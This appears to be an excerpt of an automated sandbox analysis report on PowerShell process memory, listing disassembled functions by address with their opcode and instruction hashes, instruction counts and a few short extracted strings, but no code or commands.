                          • Instruction ID: c453b941482be090edd7f4da8a3819fdfb3a3e3e33205c53cef9409230ce1935
                          • Opcode Fuzzy Hash: 54d21165ce21c0370157f2be138cdf63964aa17db7800ab7d2d2596415b2722c
                          • Instruction Fuzzy Hash: E2021321D0EBC65FE797AB3848552B47BE1EF66660F0900FAC04CCB197EE199C4A8356
                          Function 00007FF848CEB276 Relevance: .5, Instructions: 471COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42b8d124ad4ca98296fd5099d8ff56f0f3d764806ef5aa16536865d1394ea831
                          • Instruction ID: eb766c933477c69e3f51399ec6e991df6a1adaedeea6d0186ad1a32b4bb90d07
                          • Opcode Fuzzy Hash: 42b8d124ad4ca98296fd5099d8ff56f0f3d764806ef5aa16536865d1394ea831
                          • Instruction Fuzzy Hash: 77F1A73090DA8D8FEBA8EF28C8557F937D1FF54350F04426AE84DC7295DB38A9458B85
                          Function 00007FF848CEC022 Relevance: .5, Instructions: 457COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14582302c125cf033ddd6a5bc134581bbf29ff1f7dd6b90753d0da538aa413c8
                          • Instruction ID: 4902e752e2dd412fc3ac579d9741f8640d44bd2e035a8c4e1a9d8a520a23a809
                          • Opcode Fuzzy Hash: 14582302c125cf033ddd6a5bc134581bbf29ff1f7dd6b90753d0da538aa413c8
                          • Instruction Fuzzy Hash: 93E1B23091CA8D8FEBA8EF28C8557F977E1FF54351F04426AE84DC7291CB78A9408785
                          Function 00007FF848DB551B Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @_H
                          • API String ID: 0-518063247
                          • Opcode ID: 92b427f2637060cf6632a8a963dc40bce7f4ddfd8934bbfb1b37985f028cc7ab
                          • Instruction ID: 706f364803188886ecf0a2364baa13a13ff1b1e335f2b1ea5b6c4dc720efeb53
                          • Opcode Fuzzy Hash: 92b427f2637060cf6632a8a963dc40bce7f4ddfd8934bbfb1b37985f028cc7ab
                          • Instruction Fuzzy Hash: B8810531E1FB8A4FEB95AB2858587B57BF1EF65390F4801BAD40DC71D2EE18AC088355
                          Function 00007FF848CEE9B5 Relevance: .6, Instructions: 639COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5b8af8a6dbb27c809beb31c35c77ab73bf6b0136e001473921e22c112510a2d
                          • Instruction ID: ab474154d87d23e70c13690db649106b4d7f049dd322df41b1b1325d9110f132
                          • Opcode Fuzzy Hash: c5b8af8a6dbb27c809beb31c35c77ab73bf6b0136e001473921e22c112510a2d
                          • Instruction Fuzzy Hash: 8BE13E30A1CA4D8FDF98EF58C495AA97BE1FFA8340F14416AE40DD7295CB35E881CB85
                          Function 00007FF848DB8C34 Relevance: .6, Instructions: 608COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5110a7a2dd5402936eaaae978152c708bf91aa6aa9e0a6384f1c109f592e701
                          • Instruction ID: ae6c60990a0cf654a6f6564b8b9bc6b52aa1c3b3f403ec2e20a68ceae5e5bc9e
                          • Opcode Fuzzy Hash: b5110a7a2dd5402936eaaae978152c708bf91aa6aa9e0a6384f1c109f592e701
                          • Instruction Fuzzy Hash: B722F331D0EBC25FE757AB3848556B47BA1EF66690F0901FEC088CB1D3EE19A849C356
                          Function 00007FF848DB7344 Relevance: .6, Instructions: 573COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e676f20ecae70ee9128c4372401f11ea87f341b570606786dafb34a0b557c467
                          • Instruction ID: f460cffe1eb5994a9058fb00f998b6d43dfae0348791fc9ebdcb19576ad41e62
                          • Opcode Fuzzy Hash: e676f20ecae70ee9128c4372401f11ea87f341b570606786dafb34a0b557c467
                          • Instruction Fuzzy Hash: 16024571E0EA8A4FE7A6A63858153B47FE1EF62261F1801BBC04DC71D3DF19AC0A8355
                          Function 00007FF848CE5415 Relevance: .5, Instructions: 515COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4042a3db05c8a6726433d41b410bf8d1842eb76bdc411f0497b6ff410dd2b4de
                          • Instruction ID: 9d9528da754f8a976539e977836b56363e5e603fc8ad84395355dbed63a894ce
                          • Opcode Fuzzy Hash: 4042a3db05c8a6726433d41b410bf8d1842eb76bdc411f0497b6ff410dd2b4de
                          • Instruction Fuzzy Hash: 12F19130A1CA498FDB99EF58C495AB97BF1FF68340F14416AD409D7296CB39EC81CB81
                          Function 00007FF848DBA209 Relevance: .5, Instructions: 468COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ac2eafbde6326a6a0070e9034af2b4c9095b9786fd1ab15dafb2851a90a6e9b
                          • Instruction ID: a56392ac3037f1cc144f714c42a50b7788b5468b4af5156ca8aa2f667b388edd
                          • Opcode Fuzzy Hash: 2ac2eafbde6326a6a0070e9034af2b4c9095b9786fd1ab15dafb2851a90a6e9b
                          • Instruction Fuzzy Hash: 22E11531E0FA865FE795EB6858553B87BE1EF65660F0800BEC04DC71C3DE29AC898356
                          Function 00007FF848DB4539 Relevance: .4, Instructions: 386COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7da2ed5f85da8c55da0c79c74c10d22dfcbea4d9661fec9af5fe1c15735e23df
                          • Instruction ID: faa7daae791d7537adc4122ed08b4dfdd056fc27016c53b86486110b8248f349
                          • Opcode Fuzzy Hash: 7da2ed5f85da8c55da0c79c74c10d22dfcbea4d9661fec9af5fe1c15735e23df
                          • Instruction Fuzzy Hash: CCB15A31E1FA865FE799E62858552B537E2EF623A0F0801BED54DC31D3EF18AC098355
                          Function 00007FF848CEBC80 Relevance: .3, Instructions: 302COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c19bd93d892d196e2f94e73dedb79555290df82bd047498d847c05981e17b83d
                          • Instruction ID: 2d3e13e0ff24840540cae6a2ea5014ff6a727433808bdfffd7f03a14fed88429
                          • Opcode Fuzzy Hash: c19bd93d892d196e2f94e73dedb79555290df82bd047498d847c05981e17b83d
                          • Instruction Fuzzy Hash: E0A1827060CA4D8FEBA8EF28D8557F937E1FF58350F04422AE84DC7295CB34A9458B86
                          Function 00007FF848DB7847 Relevance: .3, Instructions: 289COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9e907142836815d8eea3898bc024d5ca9863d71cf660f495709675038eb9fd4
                          • Instruction ID: 16e60099bc79178dcd548043a9430e046995e5ac05d475a715899cf32688f7c6
                          • Opcode Fuzzy Hash: f9e907142836815d8eea3898bc024d5ca9863d71cf660f495709675038eb9fd4
                          • Instruction Fuzzy Hash: 49712632E1EA594FEB99F62C58466B977D1EF65660F0401BED00DC3192EF15EC0AC389
                          Function 00007FF848CE545C Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f08230e69a7cccd1dd383aab5d427195f83512cdc9ea7adc58145be4bcd63a7
                          • Instruction ID: 1d58ab85f059873a2fdfd990dbd7ff9dd40dea66ed29c2315c0524392b78f428
                          • Opcode Fuzzy Hash: 6f08230e69a7cccd1dd383aab5d427195f83512cdc9ea7adc58145be4bcd63a7
                          • Instruction Fuzzy Hash: 6D310631A1CA098FEB88EA1CC495AB573E1FF99351B10057ED48EC3666DA26FC42C781
                          Function 00007FF848DB5602 Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21f824af3bba129e4c3fbd86580f5ab23dc44de6cdd70ffd52b650fc2f1f24ce
                          • Instruction ID: 8b9a2c7851768b1b6ecd3e1f24c59562c82fd83612ab76452484430f3439ba35
                          • Opcode Fuzzy Hash: 21f824af3bba129e4c3fbd86580f5ab23dc44de6cdd70ffd52b650fc2f1f24ce
                          • Instruction Fuzzy Hash: BE31E622D1FAC74FF796A72818152B8AAF0EF656A0F4801BAD41DC31D3DF0C6C08831A
                          Function 00007FF848DB46C4 Relevance: .1, Instructions: 97COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 78527321190ed2283672dc0026eb2821e80b23ed9e9ce6c7a7d3960270fdd469
                          • Instruction ID: 778ca23e70f964cfa08f8584c635120fd12899eeed79526573666f5b23e7e329
                          • Opcode Fuzzy Hash: 78527321190ed2283672dc0026eb2821e80b23ed9e9ce6c7a7d3960270fdd469
                          • Instruction Fuzzy Hash: 2C21F621E1FA8A4FE3A9E62C14553B566D3EF626A0F4801BAD20DC71D3DF19AC49C249
                          Function 00007FF848CEB734 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8e3271e1f95808f0c92b6ccfabcb6a37f82dd38e250572b5b2dd6bdb6d88a12
                          • Instruction ID: d833c06bc98049cf6dbe1b66a3109fbb69beb7f08fcce0b2360efe6079c5c104
                          • Opcode Fuzzy Hash: d8e3271e1f95808f0c92b6ccfabcb6a37f82dd38e250572b5b2dd6bdb6d88a12
                          • Instruction Fuzzy Hash: 5331013081964E8FFBF8EB24CC5ABFA3290FF42399F400139D40D96592DB3C6985CA25
                          Function 00007FF848DB19AF Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfb6335e2faa32c1c714515adbb9b373d82ef517a0ffcf86c1713f858dd2a223
                          • Instruction ID: ae86f7ac07c1d6238662be1847ece2b7b5eb7a2faf723308b02b4fb0eb466501
                          • Opcode Fuzzy Hash: cfb6335e2faa32c1c714515adbb9b373d82ef517a0ffcf86c1713f858dd2a223
                          • Instruction Fuzzy Hash: 5221D022E0FAC55FFB55A33C28582746AE1EF6AA90F0901FAD059C71D7DD0C584A832A
                          Function 00007FF848CE41E5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b087f3ca92c2311e80b188d83d947c27c563e54626839b894b76540d165197c
                          • Instruction ID: 6197291c6594a357b7f33fb97b0b6713c80dc866da0f84f3946b6f355e64e559
                          • Opcode Fuzzy Hash: 4b087f3ca92c2311e80b188d83d947c27c563e54626839b894b76540d165197c
                          • Instruction Fuzzy Hash: DE01447111CB084FDB44EF4CE451AA5B7E0FB95364F10056DE58AC3655D726E882CB45
                          Function 00007FF848CE5558 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253082152.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848ce0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c6d3bc046ce586e77bc24bc9e8ede169c5ceef2ded8fa789533d3d7604be322
                          • Instruction ID: 8df7ffaf8aab22e94478f2caeaaa27b85c4209ee64d61dc1b8c55414c4403e61
                          • Opcode Fuzzy Hash: 1c6d3bc046ce586e77bc24bc9e8ede169c5ceef2ded8fa789533d3d7604be322
                          • Instruction Fuzzy Hash: 47F06C3275CA044FDB4CEA1CF4419B573D1E795361F10017EF48BC3696D917E842C685
                          Function 00007FF848DB97F7 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction ID: 52b117e2793392701b91597360c0d1074a8f7919f0ec5fff13a714104abb3998
                          • Opcode Fuzzy Hash: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction Fuzzy Hash: EEF0B432D0DA889FDF95FF6884455A9BBF0EF65251B0400BFD049D3192EA19A849C781
                          Function 00007FF848DBA007 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction ID: 1f90bf298bd6f4dec95992fdb917d3565810b3ab60371dc65359e58723e6ae7c
                          • Opcode Fuzzy Hash: 2aa5b5cbe279a041a5eb5e7b46980975138874fd279699c22a4625f460d9fc7e
                          • Instruction Fuzzy Hash: 48F0B43290EA888FDFA5FB6884459E9BBF0EF65251B0400BFD049D3192DE19A888C741
                          Function 00007FF848DB7BC4 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbf43c1ae71aa95561cc665f56a26c6d6a3ef10eca82676c7e7ad53dd1152956
                          • Instruction ID: a6a00a2dcba9fb3e73fb20ae977f171ab3232d38271bdc3d2681985d08935e45
                          • Opcode Fuzzy Hash: cbf43c1ae71aa95561cc665f56a26c6d6a3ef10eca82676c7e7ad53dd1152956
                          • Instruction Fuzzy Hash: D0F02721A0EE884FEBA5FB2C84915B177E0EF2935071800EAC049C7187DA19AC85C795

                          Executed Functions

                          Function 049DF320 Relevance: .3, Instructions: 281COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13c798d89fd2000b6a35dba18ff4acb8c06f661102808463ad30475b642b9595
                          • Instruction ID: f20529f49d9df41cc0245fe1bc0fb3485f4a64bb143a5e3e795b2aa6566e1aac
                          • Opcode Fuzzy Hash: 13c798d89fd2000b6a35dba18ff4acb8c06f661102808463ad30475b642b9595
                          • Instruction Fuzzy Hash: B2B13E70E00209DFDB10CFA9D9867ADBBF6AF88314F14C539E416E7258EB74A845CB91
                          Function 049DFBF0 Relevance: .3, Instructions: 266COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2102326debb207a66430d054c398805faedd417cbee9543b4c5cc8d79b03d6c0
                          • Instruction ID: 007e9ba0fbdde513fb3c4db3c448920207fb3d1226233648ba79f9d24942c032
                          • Opcode Fuzzy Hash: 2102326debb207a66430d054c398805faedd417cbee9543b4c5cc8d79b03d6c0
                          • Instruction Fuzzy Hash: 9AB18070E00209DFDB14CFA8D98679DBBF6AF88314F14C539E816E7258EB74A845CB81
                          Function 07747DF0 Relevance: 23.2, Strings: 18, Instructions: 651COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                          • API String ID: 0-1951506915
                          • Opcode ID: 4462fb632ea14716170f32d91511f6a03e81d42f5eac475457ba5669bc0f9c48
                          • Instruction ID: 099df68660083c7efcebcc565cf8e7c077c3bbfb5e812c819428d22f9c5e4819
                          • Opcode Fuzzy Hash: 4462fb632ea14716170f32d91511f6a03e81d42f5eac475457ba5669bc0f9c48
                          • Instruction Fuzzy Hash: AA2259F170421ADFCB259BB9C85066ABBE2AFC6294F14887AD505CB252DF31DC41C7A3
                          Function 07742F20 Relevance: 9.1, Strings: 7, Instructions: 380COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq
                          • API String ID: 0-2404318043
                          • Opcode ID: 07184af5380a720430d65236f01147771a3eb811aab87c08203d9a43bf455309
                          • Instruction ID: 469e9e44c8ac578f0fa51918e721003da13b3c2bc5aca3c8176c24032b033022
                          • Opcode Fuzzy Hash: 07184af5380a720430d65236f01147771a3eb811aab87c08203d9a43bf455309
                          • Instruction Fuzzy Hash: CBD16AB06093859FC7168B788855A66BFB1AF87250F58C4DBE848DF2A3CB35DC42C761
                          Function 07747810 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq
                          • API String ID: 0-2534308389
                          • Opcode ID: 182f35254703a4653348568bc743e6d6e033e80602dcdd681e74f155cfe2b991
                          • Instruction ID: 5230a54795d47ffa6a9ededd270d6bf92a7dbbfe9d01ec7cf4663c60079cd07c
                          • Opcode Fuzzy Hash: 182f35254703a4653348568bc743e6d6e033e80602dcdd681e74f155cfe2b991
                          • Instruction Fuzzy Hash: CCD19FB0B102069FCB18DBA8C555BAEBBB3AF99344F14C458E501AF355CB75EC82CB91
                          Function 049DB830 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hwq$$sq$$sq
                          • API String ID: 0-2950745084
                          • Opcode ID: 0c5ace64b95666daa76f760aa201c41e2d81a2cfd7e154a661f23bde976bbe22
                          • Instruction ID: ac8486460f52a1ae9eef8ec083c98ec8784545977ada8bae69ea079fc45598b0
                          • Opcode Fuzzy Hash: 0c5ace64b95666daa76f760aa201c41e2d81a2cfd7e154a661f23bde976bbe22
                          • Instruction Fuzzy Hash: C6227D34B012548FCB25EF64C8946AEB7B6BF89304F1581E9D50AAB361DF35AD81CF80
                          Function 07748700 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$$sq
                          • API String ID: 0-298899069
                          • Opcode ID: 1565ee6137a19edfd3f5dc068a4065564443dc9f80c73c5e9e34170685806f98
                          • Instruction ID: ae195f596814549ff14fe3a6e841b319b647de104da3e4b306b34bf273102667
                          • Opcode Fuzzy Hash: 1565ee6137a19edfd3f5dc068a4065564443dc9f80c73c5e9e34170685806f98
                          • Instruction Fuzzy Hash: 05A13BB17043498FCB269B78886177ABBA26F86344F1488BAD541CF292DF35DC41C7A3
                          Function 077477FB Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq
                          • API String ID: 0-1334358483
                          • Opcode ID: 6ae92fa5c143fd74c68424d9c13920c4fefdf836f6adb22216d7cd72e0f03eab
                          • Instruction ID: 64aa233b36bf228f88c4fa9b816a23d32fe374ea60cb90f031be5a6e1162827e
                          • Opcode Fuzzy Hash: 6ae92fa5c143fd74c68424d9c13920c4fefdf836f6adb22216d7cd72e0f03eab
                          • Instruction Fuzzy Hash: FBB1AEB0A00206DFDB19CFA8C541BAEBBB2AF89344F15C559E5016F355CB75AC82CBD1
                          Function 07740B48 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $sq$$sq$$sq
                          • API String ID: 0-2087541542
                          • Opcode ID: 66e0cc70a60a525e068a1abcfb0197d0d2eda5a2354b157fabee5b4769da6721
                          • Instruction ID: 8d5862d845e7164a068877af7aeba5c75846e955d014e772f1a66b4ce0c88ac7
                          • Opcode Fuzzy Hash: 66e0cc70a60a525e068a1abcfb0197d0d2eda5a2354b157fabee5b4769da6721
                          • Instruction Fuzzy Hash: 6F413AB6B002159FCB249AA98C402BEF7A1AFC9354B1485AACE06EB241DF31DD41C7D5
                          Function 07746743 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq
                          • API String ID: 0-780347173
                          • Opcode ID: 3b7b16fe2442ad27e053b0b990dfa141418051b4a4559def5abc391045875fab
                          • Instruction ID: 07692312e8710659fcce028a482e6abcd4a50ded4b4b75d2558431e1df446721
                          • Opcode Fuzzy Hash: 3b7b16fe2442ad27e053b0b990dfa141418051b4a4559def5abc391045875fab
                          • Instruction Fuzzy Hash: 6BF191B4B002159FDB24DB68CD51BAABBB3BF85344F108499E509AF781CB71AD81CF91
                          Function 07740B35 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $sq$$sq
                          • API String ID: 0-1184984226
                          • Opcode ID: 22ea5a770338e0032338358859ed6c4868f066fbb7b2ce46b2fdf3e148d17fa2
                          • Instruction ID: 7b1bcce25f39bae8e14127454035a6b6d0bb975b328dd6a7c81821f730e04260
                          • Opcode Fuzzy Hash: 22ea5a770338e0032338358859ed6c4868f066fbb7b2ce46b2fdf3e148d17fa2
                          • Instruction Fuzzy Hash: 6F21F6B6904356DFCB248F588D806B9FBB0BF86254B2585AACD19B7202D7309940CB98
                          Function 077486F9 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
